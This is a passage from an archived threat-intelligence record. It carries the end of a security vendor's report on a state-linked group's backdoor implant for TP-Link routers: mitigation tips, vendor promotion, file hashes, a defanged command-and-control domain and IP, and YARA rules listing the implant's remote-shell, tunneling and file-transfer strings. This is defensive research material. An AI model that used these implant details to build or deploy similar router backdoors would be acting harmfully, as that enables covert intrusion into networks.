Make sure to regularly update routers’ and other devices’ firmware and software to close vulnerabilities that attackers exploit.\r\nDefault Credentials\r\nAlways change the default login credentials of any device connected to the internet to stronger passwords and use multi-factor authentication whenever possible. Attackers scan the internet for devices that still use their default credentials.\r\nCheck Point’s network security solutions provide advanced threat prevention and real-time network protection against sophisticated attacks like those used by the Camaro Dragon APT group. This includes protection against exploits, malware, and other advanced threats. Check Point’s Quantum IoT Protect automatically identifies and maps IoT devices and assesses the risk, prevents unauthorized access to and from IoT/OT devices with zero-trust profiling and segmentation, and blocks attacks against IoT devices. Check Point’s Threat Emulation detects these threats as APT.Wins.HorseShell.A and APT.Wins.HorseShell.B.\r\nConclusion\r\nOur analysis of the Chinese state-sponsored APT group Camaro Dragon’s attacks on European foreign affairs entities has uncovered a malicious firmware implant tailored for TP-Link routers. The implant features a custom backdoor called “Horse Shell” which enables the attackers to perform actions like remote shell, file transfer, and network tunneling, making it easier for them to anonymize their communication through a chain of infected nodes.\r\nThrough our investigation, we have gained a deeper comprehension of the ways in which attackers are employing malware to target edge devices, particularly routers. Our efforts have led us to uncover several of the tactics and tools utilized by Camaro Dragon in their attacks. 
Our findings not only contribute to a better understanding of the Camaro Dragon group and their toolset but also to the broader cybersecurity community, providing crucial knowledge for understanding and defending against similar threats in the future.\r\nFurthermore, our discovery of the firmware-agnostic nature of the implanted components indicates that a wide range of devices and vendors may be at risk. We hope that our research will contribute to improving the security posture of organizations and individuals alike. In the meantime, remember to keep your network devices updated and secured, and beware of any suspicious activity on your network — you never know who might be lurking in the dragon’s lair!\r\nCheck Point Customers Remain Protected\r\nCheck Point IoT Embedded with Nano Agent® provides on-device runtime protection, enabling connected devices with built-in firmware security. The Nano Agent® is a customized package which provides the top security capabilities and prevents malicious activity on routers, network devices and other IoT devices. Check Point IoT Nano Agent® has advanced capabilities of memory protection, anomaly detection, and control flow integrity. 
It\r\noperates inside the device, and serves as a frontline to secure IoT devices.\r\nAppendix A – IOCs\r\nSHA256 File Name\r\n998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c udhcp\r\n7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a sheel\r\ned3d667a4fa92d78a0a54f696f4e8ff254def8d6f3208e6fe426dbe7fb3f3dd0 shell\r\n66cc81a7d865941cb32ed7b1b84b20270d7d667b523cab28b856cd4e85f135b6 timer\r\n8a2e9f6c2b0c898090fdce021b3813313e73a256a5de39c100bf9868abc09dbb 9406.dat\r\nda046a1fe6f3b94e48c24ffd341f8d97bfc06252ddf4d332e8e2478262ad1964 9404.dat\r\nWritten Files\r\nFile Name Description\r\n/vat/udhcp.cnf Contains kill -9 [pid] command that has the pid of the running implant\r\n/var/udhcp A mutex like file that will be created when the implant is running.\r\n.remote_shell.log Log file of the remote shell functionality of the implant\r\nInfrastructure\r\nIoC Description\r\nm.cremessage[.]com Command and Control\r\n91.245.253[.]72 Hosts TPLink implant C2 domain m[.]cremessage[.]com\r\nAppendix B: Yara Signatures\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 22 of 45\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nrule apt_CN_CamaroDragon_horseshell_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's HorseShell implant for routers based on embedded strings. 
This rule is\r\nbroad.\"\r\nhash = \"998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c\"\r\nreference = \"\"\r\nstrings:\r\n// Crypto\r\n$crypto_1 = \"wzsw_srand\"\r\n$crypto_2 = \"wzsw_rand\"\r\n$crypto_3 = \"wzsw_init\"\r\n$crypto_4 = \"wzsw_crypto_free\"\r\n$crypto_5 = \"wzsw_crypto_new\"\r\n$crypto_6 = \"wzsw_encrypt_buf\"\r\n$crypto_7 = \"wzsw_crypto_reset\"\r\n// File names\r\n$filename_1 = \"common/wzsw_crypto.c\"\r\n$filename_2 = \"http/http_socks_tun.cc\"\r\n$filename_3 = \"http/http_trans_file.cc\"\r\n$filename_4 = \"http/http_horse_shell.cc\"\r\n$filename_5 = \"http/http_online.cc\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 23 of 45\n\n// Debug strings\r\n$debug_1 = \"add_file_transfer_info_to_list\"\r\n$debug_2 = \"before trans data need connect\"\r\n$debug_3 = \"before trans data need connect2\"\r\n$debug_4 = \"cancel current task!\"\r\n$debug_5 = \"cancel task from task list!\"\r\n$debug_6 = \"cancel task task id\"\r\n$debug_7 = \"check file file_type is %d, neither file nor dir !\"\r\n$debug_8 = \"check_file_transfer_conn_heart_beat\"\r\n$debug_9 = \"check_module_heart_beat\"\r\n$debug_10 = \"check_socks_tun_conn_heart_beat\"\r\n$debug_11 = \"conn_marked_close\"\r\n$debug_12 = \"conn_peek socket (sock=%d) closed\"\r\n$debug_13 = \"conn_peek socket (sock=%d) recv error,err=%d\"\r\n$debug_14 = \"conn_read socket (sock=%d) closed\"\r\n$debug_15 = \"conn_read socket (sock=%d) recv error,err=%d\"\r\n$debug_16 = \"conn_readfrom socket (sock=%d) recv error,err=%d\"\r\n$debug_17 = \"connect lan '%s:%d' in progress!\"\r\n$debug_18 = \"create_shell_conn_session\"\r\n$debug_19 = \"create_shell_pty_session\"\r\n$debug_20 = \"current task %p is not download!\"\r\n$debug_21 = \"file transfer download open file %s succeed!\"\r\n$debug_22 = \"file transfer oper %d neither download nor upload\"\r\n$debug_23 = \"file transfer process connect port cmd-\u003eport\"\r\n$debug_24 = \"file 
transfer upload open file %s succeed\"\r\n$debug_25 = \"file_transfer_data_request...cur_len=%d\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 24 of 45\n\n$debug_26 = \"file_transfer_data_request...SEND_RSP\"\r\n$debug_27 = \"file_transfer_data_request\"\r\n$debug_28 = \"file_transfer_delete_request\"\r\n$debug_29 = \"file_transfer_download_request\"\r\n$debug_30 = \"file_transfer_free_cb\"\r\n$debug_31 = \"file_transfer_info port %d already started!\"\r\n$debug_32 = \"file_transfer_process_connect_port\"\r\n$debug_33 = \"file_transfer_query_request\"\r\n$debug_34 = \"file_transfer_send_file_data\"\r\n$debug_35 = \"file_transfer_upload_request\"\r\n$debug_36 = \"find ipv4=%s, port=%d by lan success!\"\r\n$debug_37 = \"find_connected_port_relay_info\"\r\n$debug_38 = \"find_port_relay_info_by_lan\"\r\n$debug_39 = \"find_start_connect_port_relay_info\"\r\n$debug_40 = \"free file transfer info!\"\r\n$debug_41 = \"get_file_transfer_info_by_conn\"\r\n$debug_42 = \"get_file_transfer_info_by_port\"\r\n$debug_43 = \"get_free_port_relay_info\"\r\n$debug_44 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$debug_45 = \"get_socks_tun_info_from_list_by_conn\"\r\n$debug_46 = \"get_socks_tun_info_from_list_by_port\"\r\n$debug_47 = \"horse_shell_start\"\r\n$debug_48 = \"http online data length %d too long\"\r\n$debug_49 = \"http_rsp:%s\"\r\n$debug_50 = \"info-\u003estate=%d not connected!\"\r\n$debug_51 = \"invalid NATPORT_COMM_CMD_CONNECT\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 25 of 45\n\n$debug_52 = \"invalid NATPORT_COMM_CMD_DISCONNECT\"\r\n$debug_53 = \"malloc file transfer info!\"\r\n$debug_54 = \"neither cancel upload nor cancel download\"\r\n$debug_55 = \"not connected, begin to connect!\"\r\n$debug_56 = \"not enough sapce to malloc a port relay info!\"\r\n$debug_57 = \"other file transfer task oper %d\"\r\n$debug_58 = \"recv 
check file '%s' exists request, file %s\"\r\n$debug_59 = \"remove current task!\"\r\n$debug_60 = \"remove_file_transfer_info_from_list\"\r\n$debug_61 = \"reverse_shell can not find bash or sh\"\r\n$debug_62 = \"shell create connection to %s:%d succeed\"\r\n$debug_63 = \"shell create_shell_pty_session succeed!\"\r\n$debug_64 = \"shell process connect port cmd-\u003eport\"\r\n$debug_65 = \"shell_pty_session_free_cb, socket=%d\"\r\n$debug_66 = \"socks tun connect lan\"\r\n$debug_67 = \"socks tun create connection %p to %s:%d succeed!\"\r\n$debug_68 = \"socks tun port %d already opened!\"\r\n$debug_69 = \"socks tun process connect port\"\r\n$debug_70 = \"socks tun try connect lan\"\r\n$debug_71 = \"trans file create connection to %s:%d succeed!\"\r\n$debug_72 = \"trans_file_start\"\r\n$debug_73 = \"tun_info-\u003efree_list\"\r\n$debug_74 = \"tun_info-\u003eused_list\"\r\n$debug_75 = \"unkown file transfer sub cmd\"\r\n$debug_76 = \"unkown socks tun sub cmd\"\r\n$debug_77 = \"shell_conn_session_connect_cb\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 26 of 45\n\n$debug_78 = \"shell_conn_session_free_cb\"\r\n$debug_79 = \"shell_get_body_from_http_rsp\"\r\n$debug_80 = \"shell_get_http_body\"\r\n$debug_81 = \"shell_get_http_filed\"\r\n// Commands\r\n$command_1 = \"SOCKS TUN REQ_CONNECT_PORT\"\r\n$command_2 = \"SOCKS TUN NATPORT_COMM_CMD_CONNECT\"\r\n$command_3 = \"SOCKS TUN NATPORT_COMM_CMD_OPEN\"\r\n$command_4 = \"SOCKS TUN NATPORT_COMM_CMD_DATA\"\r\n$command_5 = \"SOCKS TUN NATPORT_COMM_CMD_CLOSE\"\r\n$command_6 = \"SOCKS TUN NATPORT_COMM_CMD_DISCONNECT\"\r\n$command_7 = \"SOCKS TUN NATPORT_COMM_CMD_CHECK\"\r\n$command_8 = \"SOCKS TUN REQ_MODULE_HEARTBEAT\"\r\n$command_9 = \"NET_REQ_HORSE_SHELL REQ_CONNECT_PORT\"\r\n$command_10 = \"FILE_TRANSFER REQ_CONNECT_PORT\"\r\n$command_11 = \"FILE_TRANSFER_OPER_DOWNLOAD\"\r\n$command_12 = \"FILE_TRANSFER_OPER_UPLOAD\"\r\n$command_13 = 
\"FILE_TRANSFER_OPER_CANCEL_DOWNLOAD\"\r\n$command_14 = \"FILE_TRANSFER_OPER_CANCEL_UPLOAD\"\r\n$command_15 = \"FILE_TRANSFER_TRANS_FILE_DATA\"\r\n$command_16 = \"FILE_TRANSFER_OPER_DELETE\"\r\n$command_17 = \"FILE_TRANSFER_OPER_QUERY\"\r\n$command_18 = \"FILE_TRANSFER_OPER_CHECK_EXISTS\"\r\n$command_19 = \"REQ_MODULE_HEARTBEAT\"\r\n// Error strings\r\n$error_1 = \" \u003e .remote_shell.log\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 27 of 45\n\n$error_2 = \"calloc mem for hall_device_online_req failed!\"\r\n$error_3 = \"conn_listening_conn bind sock=%d failed\"\r\n$error_4 = \"conn_listening_conn listen sock=%d failed\"\r\n$error_5 = \"conn_listening_conn set sock=%d address failed\"\r\n$error_6 = \"conn_listening_conn set sock=%d nonblock failed\"\r\n$error_7 = \"conn_listening_conn set sock=%d reuse address failed\"\r\n$error_8 = \"conn_listening_conn set sock=%d tcp no delay failed\"\r\n$error_9 = \"conn_tcp_conn connect sock=%d failed,err=%d\"\r\n$error_10 = \"conn_tcp_conn set sock=%d address failed,err=%d\"\r\n$error_11 = \"conn_tcp_conn set sock=%d nonblock failed,err=%d\"\r\n$error_12 = \"conn_tcp_conn set sock=%d reuse address failed,err=%d\"\r\n$error_13 = \"conn_tcp_conn set sock=%d tcp no delay failed,err=%d\"\r\n$error_14 = \"conn_udp_conn bind sock=%d failed\"\r\n$error_15 = \"conn_udp_conn set sock=%d address failed\"\r\n$error_16 = \"conn_udp_conn set sock=%d nonblock failed\"\r\n$error_17 = \"conn_udp_conn set sock=%d reuse address failed\"\r\n$error_18 = \"create file_transfer_info failed!\"\r\n$error_19 = \"create g_file_transfer_info_list failed!\"\r\n$error_20 = \"create g_socks_tun_list failed!\"\r\n$error_21 = \"create shell conn session failed!\"\r\n$error_22 = \"crypto_decrypt_buf error,\"\r\n$error_23 = \"delete file:%s fialed\"\r\n$error_24 = \"disconnect this http conn\"\r\n$error_25 = \"download file %s failed, safe read length=%d from fd=%d failed, 
retlen=%d!\"\r\n$error_26 = \"file transfer download open file %s fialed!\"\r\n$error_27 = \"file transfer process connect port failed, ret = %d!\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 28 of 45\n\n$error_28 = \"file transfer upload open file %s failed\"\r\n$error_29 = \"find connected ipv4_port ipv4=%s, port=%d failed!\"\r\n$error_30 = \"find connected port_relay_info ipv4=%s, port=%d failed!\"\r\n$error_31 = \"find ipv4=%s, port=%d by lan failed!\"\r\n$error_32 = \"get a free port_relay_info failed , not enough sapce to save lan ipv4 and port\"\r\n$error_33 = \"http connect failed, errno=%d, reason=%s\"\r\n$error_34 = \"http data length %d too long\"\r\n$error_35 = \"init conf failed\"\r\n$error_36 = \"open fialed ret=%d\"\r\n$error_37 = \"peek http rsp failed!\"\r\n$error_38 = \"peek socks tun data from %s:%d sock=%d failed!\"\r\n$error_39 = \"read ip failed, %m\"\r\n$error_40 = \"resolve online domain failed\"\r\n$error_41 = \"send data to dst socket %d failed!\"\r\n$error_42 = \"send failed (sock=%d,err=%d)\"\r\n$error_43 = \"sendto failed (peer address=%s,err=%d)\"\r\n$error_45 = \"set socket opt failed, %m!\"\r\n$error_46 = \"shell create connection to %s:%d failed!\"\r\n$error_47 = \"shell create_shell_pty_session failed!\"\r\n$error_48 = \"shell process connect port failed, ret = %d!\"\r\n$error_49 = \"socks tun connect lan '%s:%d' failed!\"\r\n$error_50 = \"socks tun create connection to %s:%d failed!\"\r\n$error_51 = \"socks tun port %d already opened!\"\r\n$error_52 = \"socks tun process connect port failed, ret = %d!\"\r\n$error_53 = \"socks tun try connect lan '%s:%d' failed!\"\r\n$error_54 = \"socks_tun_connect_cb failed %p\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 29 of 45\n\n$error_55 = \"socks_tun_info_new failed!\"\r\n$error_56 = \"start shell '%s' failed!\"\r\n$error_57 = \"tcp online create conn 
failed!\"\r\n$error_58 = \"tcp online create http_online_info_t failed!\"\r\n$error_59 = \"trans file create connection to %s:%d failed!\"\r\n$error_60 = \"try connect failed\"\r\n$error_61 = \"try connect lan '%s:%d' failed!\"\r\n$error_62 = \"wzsw_init failed\"\r\n// function names\r\n$function_1 = \"shell_conn_session_connect_cb\"\r\n$function_2 = \"shell_conn_session_free_cb\"\r\n$function_3 = \"shell_get_body_from_http_rsp\"\r\n$function_4 = \"shell_get_http_body\"\r\n$function_5 = \"shell_get_http_filed\"\r\n$function_6 = \"send_file_transfer_conn_heart_beat\"\r\n$function_7 = \"send_file_transfer_http_data_net_packet\"\r\n$function_8 = \"send_horse_shell_http_data_net_packet\"\r\n$function_9 = \"send_module_heart_beat\"\r\n$function_10 = \"send_socks_tun_cmd_info_packet\"\r\n$function_11 = \"send_socks_tun_conn_heart_beat\"\r\n$function_12 = \"send_socks_tun_http_data_net_packet\"\r\n$function_13 = \"send_socks_tun_net_packet\"\r\n$function_14 = \"send_socks_tun_status_packet\"\r\n$function_15 = \"socks_get_body_from_http_rsp\"\r\n$function_16 = \"socks_get_http_body\"\r\n$function_17 = \"socks_get_http_filed\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 30 of 45\n\n$function_18 = \"socks_tun_conn_cb\"\r\n$function_19 = \"socks_tun_conn_free_cb\"\r\n$function_20 = \"socks_tun_conn_lan_cb\"\r\n$function_21 = \"socks_tun_conn_lan_free_cb\"\r\n$function_22 = \"socks_tun_connect_cb\"\r\n$function_23 = \"socks_tun_connect_lan_cb\"\r\n$function_24 = \"socks_tun_info_free\"\r\n$function_25 = \"socks_tun_info_new\"\r\n$function_26 = \"socks_tun_process_check\"\r\n$function_27 = \"socks_tun_process_connect_port\"\r\n$function_28 = \"socks_tun_process_connect\"\r\n$function_29 = \"socks_tun_process_data\"\r\n$function_30 = \"socks_tun_process_disconnect\"\r\n$function_31 = \"socks_tun_process_open\"\r\n$function_32 = \"socks_tun_start\"\r\n$function_33 = 
\"socks_tun_try_connect_lan_port_cb\"\r\n$function_34 = \"check_file_transfer_conn_heart_beat\"\r\n$function_35 = \"check_socks_tun_conn_heart_beat\"\r\n$function_36 = \"conn_init_tcp_conn\"\r\n$function_37 = \"conn_marked_close\"\r\n$function_38 = \"conn_read_buffer_length\"\r\n$function_39 = \"conn_set_callback\"\r\n$function_40 = \"conn_set_free_callback\"\r\n$function_41 = \"conn_set_user_data\"\r\n$function_42 = \"conn_start_read\"\r\n$function_43 = \"conn_start_write\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 31 of 45\n\n$function_44 = \"conn_stop_write\"\r\n$function_45 = \"conn_tcp_conn\"\r\n$function_46 = \"conn_uninit_containers\"\r\n$function_47 = \"find_connected_port_relay_info\"\r\n$function_48 = \"find_port_relay_info_by_lan\"\r\n$function_49 = \"find_start_connect_port_relay_info\"\r\n$function_50 = \"get_free_port_relay_info\"\r\n$function_51 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$function_52 = \"get_port_relay_info\"\r\n$function_53 = \"horse_main\"\r\n$function_54 = \"process_dev_online\"\r\n$function_55 = \"process_http_read_events\"\r\n$function_56 = \"process_shell_conn_session_read_events\"\r\n$function_57 = \"process_shell_conn_session_write_events\"\r\n$function_58 = \"put_port_relay_info\"\r\n$function_59 = \"send_file_transfer_conn_heart_beat\"\r\n$function_60 = \"send_socks_tun_conn_heart_beat\"\r\n$function_61 = \"process_file_transfer_read_events\"\r\n$function_62 = \"process_file_transfer_write_events\"\r\n$function_63 = \"process_pty_conn_read_events\"\r\n$function_64 = \"process_pty_conn_write_events\"\r\n$function_65 = \"process_shell_conn_connect_port\"\r\n$function_66 = \"process_shell_conn_session_read_events\"\r\n$function_67 = \"process_shell_conn_session_write_events\"\r\n$function_68 = \"process_socks_tun_lan_conn_read_events\"\r\n$function_69 = 
\"process_socks_tun_read_events\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 32 of 45\n\n$function_70 = \"process_transfile_task\"\r\n$function_71 = \"put_port_relay_info\"\r\n$function_72 = \"socks_get_body_from_http_rsp\"\r\n$function_73 = \"socks_get_http_body\"\r\n$function_74 = \"socks_get_http_filed\"\r\n$function_75 = \"socks_tun_conn_cb\"\r\n$function_76 = \"socks_tun_conn_free_cb\"\r\n$function_77 = \"socks_tun_conn_lan_cb\"\r\n$function_78 = \"socks_tun_conn_lan_free_cb\"\r\n$function_79 = \"socks_tun_connect_cb\"\r\n$function_80 = \"socks_tun_connect_lan_cb\"\r\n$function_81 = \"socks_tun_info_free\"\r\n$function_82 = \"socks_tun_info_new\"\r\n$function_83 = \"socks_tun_process_check\"\r\n$function_84 = \"socks_tun_process_connect_port\"\r\n$function_85 = \"socks_tun_process_connect\"\r\n$function_86 = \"socks_tun_process_data\"\r\n$function_87 = \"socks_tun_process_disconnect\"\r\n$function_88 = \"socks_tun_process_open\"\r\n$function_89 = \"socks_tun_start\"\r\n$function_90 = \"socks_tun_try_connect_lan_port_cb\"\r\n// Globals\r\n$global_1 = \"g_socks_tun_list\"\r\ncondition:\r\nfilesize \u003c 2MB and\r\n3 of ($crypto_*) or\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 33 of 45\n\n2 of ($filename_*) or\r\n3 of ($debug_*) or\r\nany of ($command_*) or\r\n3 of ($error_*) or\r\n3 of ($function_*) or\r\n$global_1 or\r\n5 of them\r\n}\r\nrule apt_CN_CamaroDragon_sheel_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's sheel tool.\"\r\nhash = \"7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a\"\r\nreference = \"\"\r\nstrings:\r\n$ = \"write failed.open fail.\"\r\n$ = \"open fail.%m\"\r\n$ = \"./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\"\r\n$ = \"./sheel -h\"\r\n$ = \"update server list 
success!\"\r\ncondition:\r\nfilesize \u003c 12KB and\r\n3 of them\r\n}\r\nSource: https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\n9404.bin: firmware 940 v4 TP-LINK Technologies ver. 1.0, version 3.16.9, [...]\n9406.bin: firmware 940 v6 TP-LINK Technologies ver. 1.0, version 3.20.1, [...]",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
	],
	"report_names": [
		"the-dragon-who-sold-his-camaro-analyzing-custom-router-implant"
	],
	"threat_actors": [
		{
			"id": "aacd5cbc-604b-4b6e-9e58-ef96c5d1a784",
			"created_at": "2023-01-06T13:46:38.953463Z",
			"updated_at": "2026-04-14T02:00:03.496308Z",
			"deleted_at": null,
			"main_name": "APT31",
			"aliases": [
				"Red keres",
				"Violet Typhoon",
				"TA412",
				"JUDGMENT PANDA",
				"BRONZE VINEWOOD"
			],
			"source_name": "MISPGALAXY:APT31",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9e6186dd-9334-4aac-9957-98f022cd3871",
			"created_at": "2022-10-25T15:50:23.357398Z",
			"updated_at": "2026-04-14T02:00:04.58979Z",
			"deleted_at": null,
			"main_name": "ZIRCONIUM",
			"aliases": [
				"APT31",
				"Violet Typhoon"
			],
			"source_name": "MITRE:ZIRCONIUM",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-14T02:00:03.435686Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"TANTALUM",
				"Twill Typhoon",
				"HoneyMyte",
				"Earth Preta",
				"Stately Taurus",
				"Polaris",
				"BRONZE PRESIDENT",
				"Red Lich",
				"TEMP.HEX",
				"TA416",
				"LuminousMoth"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-14T02:00:03.708616Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-14T02:00:03.65686Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479",
			"created_at": "2023-10-27T02:00:07.764261Z",
			"updated_at": "2026-04-14T02:00:03.772577Z",
			"deleted_at": null,
			"main_name": "Camaro Dragon",
			"aliases": [],
			"source_name": "MISPGALAXY:Camaro Dragon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-14T02:00:04.504477Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "74d9dada-0106-414a-8bb9-b0d527db7756",
			"created_at": "2025-08-07T02:03:24.69718Z",
			"updated_at": "2026-04-14T02:00:03.768395Z",
			"deleted_at": null,
			"main_name": "BRONZE VINEWOOD",
			"aliases": [
				"APT31 ",
				"BRONZE EXPRESS ",
				"Judgment Panda ",
				"Red Keres",
				"TA412",
				"VINEWOOD ",
				"Violet Typhoon ",
				"ZIRCONIUM "
			],
			"source_name": "Secureworks:BRONZE VINEWOOD",
			"tools": [
				"DropboxAES RAT",
				"HanaLoader",
				"Metasploit",
				"Mimikatz",
				"Reverse ICMP shell",
				"Trochilus"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-14T02:00:05.249347Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1776133344,
	"ts_updated_at": 1776186098,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.pdf",
		"text": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.txt",
		"img": "https://archive.orkl.eu/13c5456ff4455241428ebd8ebd5277ac5b53fb90.jpg"
	}
}